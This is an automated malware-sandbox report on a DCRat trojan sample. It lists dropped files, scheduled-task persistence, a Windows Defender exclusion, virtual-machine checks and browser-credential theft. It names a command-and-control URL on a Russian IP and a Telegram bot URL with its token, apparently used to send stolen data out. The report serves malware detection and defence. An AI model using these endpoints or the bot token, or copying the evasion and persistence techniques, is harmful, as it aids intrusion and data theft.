                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531798 Sample: d3ca1c9cdcf0f664f4c4b469ce9... Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 70 api.telegram.org 2->70 72 ipinfo.io 2->72 82 Suricata IDS alerts for network traffic 2->82 84 Antivirus detection for dropped file 2->84 86 Antivirus / Scanner detection for submitted sample 2->86 90 15 other signatures 2->90 8 d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe 18 35 2->8         started        13 JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe 2->13         started        15 WmiPrvSE.exe 2->15         started        17 5 other processes 2->17 signatures3 88 Uses the Telegram API (likely for C&C communication) 70->88 process4 dnsIp5 74 api.telegram.org 149.154.167.220, 443, 49706 TELEGRAMRU United Kingdom 8->74 76 ipinfo.io 34.117.59.81, 443, 49704, 49705 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->76 54 C:\Users\user\Downloads\smartscreen.exe, PE32 8->54 dropped 56 C:\Users\user\Desktop\yuQrGMvY.log, PE32 8->56 dropped 58 C:\Users\user\Desktop\ylgZbdUT.log, PE32 8->58 dropped 66 20 other malicious files 8->66 dropped 94 Adds a directory exclusion to Windows Defender 8->94 96 Creates processes via WMI 8->96 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        32 10 other processes 8->32 78 5.42.66.51, 49798, 49851, 49852 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 13->78 60 C:\Users\user\Desktop\ttRrlCpd.log, PE32 13->60 dropped 62 C:\Users\user\Desktop\rreJQTki.log, PE32 13->62 dropped 64 C:\Users\user\Desktop\qDaBeGpk.log, PE32 13->64 dropped 68 11 other malicious files 13->68 dropped 98 Multi AV Scanner detection for dropped file 13->98 100 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->100 102 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 13->102 104 Tries to harvest and steal browser information (history, passwords, etc) 13->104 26 powershell.exe 13->26         started        28 powershell.exe 13->28         started        30 powershell.exe 13->30         started        34 9 other processes 13->34 106 Antivirus detection for dropped file 15->106 108 Machine Learning detection for dropped file 15->108 80 127.0.0.1 unknown unknown 17->80 file6 signatures7 process8 signatures9 92 Loading BitLocker PowerShell Module 19->92 36 conhost.exe 19->36         started        38 conhost.exe 22->38         started        40 conhost.exe 24->40         started        42 conhost.exe 26->42         started        44 conhost.exe 28->44         started        46 conhost.exe 30->46         started        48 conhost.exe 32->48         started        50 12 other processes 32->50 52 9 other processes 34->52 process10

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe100%AviraHEUR/AGEN.1323342
                            d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe100%AviraHEUR/AGEN.1323342
                            C:\Recovery\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe100%Joe Sandbox ML
                            C:\Recovery\WmiPrvSE.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\ArFrORkS.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\DhiqiJKM.log6%ReversingLabs
                            C:\Users\user\Desktop\EhviVOkL.log46%ReversingLabsWin32.Ransomware.Bitpy
                            C:\Users\user\Desktop\FNQYcsFE.log5%ReversingLabs
                            C:\Users\user\Desktop\IUzpLFaA.log4%ReversingLabs
                            C:\Users\user\Desktop\KIRpkYvx.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\PwjnMVKl.log4%ReversingLabs
                            C:\Users\user\Desktop\QyIevzpi.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\RGFoMnqm.log3%ReversingLabs
                            C:\Users\user\Desktop\VWRNVcdg.log29%ReversingLabs
                            C:\Users\user\Desktop\VoMNpBPa.log6%ReversingLabs
                            C:\Users\user\Desktop\WyUWCOVc.log5%ReversingLabs
                            C:\Users\user\Desktop\aceLSxeO.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\bmmUfKkQ.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\fTGLCVSM.log29%ReversingLabs
                            C:\Users\user\Desktop\fcdLmHlJ.log4%ReversingLabs
                            C:\Users\user\Desktop\gUHludjC.log17%ReversingLabs
                            C:\Users\user\Desktop\hILtgrfA.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\nGlBWAAq.log3%ReversingLabs
                            C:\Users\user\Desktop\qDaBeGpk.log4%ReversingLabs
                            C:\Users\user\Desktop\rreJQTki.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\sBnSdgqk.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\stDzyxQe.log8%ReversingLabs
                            C:\Users\user\Desktop\ttRrlCpd.log8%ReversingLabs
                            C:\Users\user\Desktop\uDZAyPvf.log46%ReversingLabsWin32.Ransomware.Bitpy
                            C:\Users\user\Desktop\wjuqGuQY.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\ylgZbdUT.log17%ReversingLabs
                            C:\Users\user\Desktop\yuQrGMvY.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Downloads\smartscreen.exe88%ReversingLabsByteCode-MSIL.Trojan.DCRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                            https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                            https://aka.ms/pscore680%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://crl.v0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ipinfo.io
                            		34.117.59.81
                            		truefalse
                              		unknown
                              api.telegram.org
                              		149.154.167.220
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://ipinfo.io/countryfalse
                                  		unknown
                                  http://5.42.66.51/8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.phptrue
                                    		unknown
                                    https://api.telegram.org/bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhotofalse
                                      		unknown
                                      https://ipinfo.io/ipfalse
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://g.live.com/odclientsettings/Prod/C:svchost.exe, 0000004F.00000003.2444686605.000001C4274F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://api.telegram.orgd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org/botd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpfalse
                                              		unknown
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://crl.micpowershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.micft.cMicRosofpowershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2899814464.0000023F8001F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/named3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crl.vd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://ipinfo.iod3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        		api.telegram.orgUnited Kingdom
                                                        		62041TELEGRAMRUtrue
                                                        5.42.66.51
                                                        		unknownRussian Federation
                                                        		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                                                        34.117.59.81
                                                        		ipinfo.ioUnited States
                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse

                                                        Private

                                                        IP
                                                        127.0.0.1

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1531798
                                                        Start date and time:2024-10-11 20:36:07 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 12m 25s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:81
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@89/164@2/4
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe
                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, PID 8536 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        14:37:07API Interceptor561x Sleep call for process: powershell.exe modified
                                                        14:37:10API Interceptor23x Sleep call for process: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe modified
                                                        14:37:37API Interceptor9193x Sleep call for process: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe modified
                                                        14:37:37API Interceptor2x Sleep call for process: svchost.exe modified
                                                        20:37:07Task SchedulerRun new task: JFQmuJhhcOwSgqtZoqXNEERKgQYwL path: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                        20:37:07Task SchedulerRun new task: JFQmuJhhcOwSgqtZoqXNEERKgQYwLJ path: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                        20:37:07Task SchedulerRun new task: smartscreen path: "C:\Users\user\Downloads\smartscreen.exe"
                                                        20:37:07Task SchedulerRun new task: smartscreens path: "C:\Users\user\Downloads\smartscreen.exe"
                                                        20:37:07Task SchedulerRun new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
                                                        20:37:08Task SchedulerRun new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        149.154.167.220PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            FDST69876500900.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              TotalXTunisiaXRFQ.scr.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                YLxU7LZv7z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  UUNbg1gvrR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    172863360835d20919b44677196a226b8640c862c471dbf7782ce73f7db5505942e7eb6033428.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      RFQ.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                                          Payment Notification.lnkGet hashmaliciousXWormBrowse
                                                                            34.117.59.81UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                            • ipinfo.io/ip
                                                                            build.exeGet hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/ip
                                                                            YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            lePDF.cmdGet hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            mjOiDa1hrN.batGet hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            8ym4cxJPyl.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            GKrKPXOkdF.zsb.dllGet hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ipinfo.iohttp://boot.uleif.comGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            https://load.alisonball.com.auGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            https://loadfile.komanda.cl/Get hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            https://loadfile.komanda.cl/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 34.117.59.81
                                                                            https://loadfile.komanda.cl/Get hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            http://pub-f3922f20d4c74ba1869fd3db906e3295.r2.dev/gsecondcheck.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 34.117.59.81
                                                                            api.telegram.orgPO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            FDST69876500900.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            TotalXTunisiaXRFQ.scr.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            YLxU7LZv7z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            UUNbg1gvrR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            172863360835d20919b44677196a226b8640c862c471dbf7782ce73f7db5505942e7eb6033428.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            RFQ.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Payment Notification.lnkGet hashmaliciousXWormBrowse
                                                                            • 149.154.167.220

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            TELEGRAMRUPO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            FDST69876500900.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            TotalXTunisiaXRFQ.scr.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            YLxU7LZv7z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            UUNbg1gvrR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            172863360835d20919b44677196a226b8640c862c471dbf7782ce73f7db5505942e7eb6033428.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            RFQ.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Payment Notification.lnkGet hashmaliciousXWormBrowse
                                                                            • 149.154.167.220
                                                                            RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUna.elfGet hashmaliciousMirai, GafgytBrowse
                                                                            • 5.42.98.74
                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
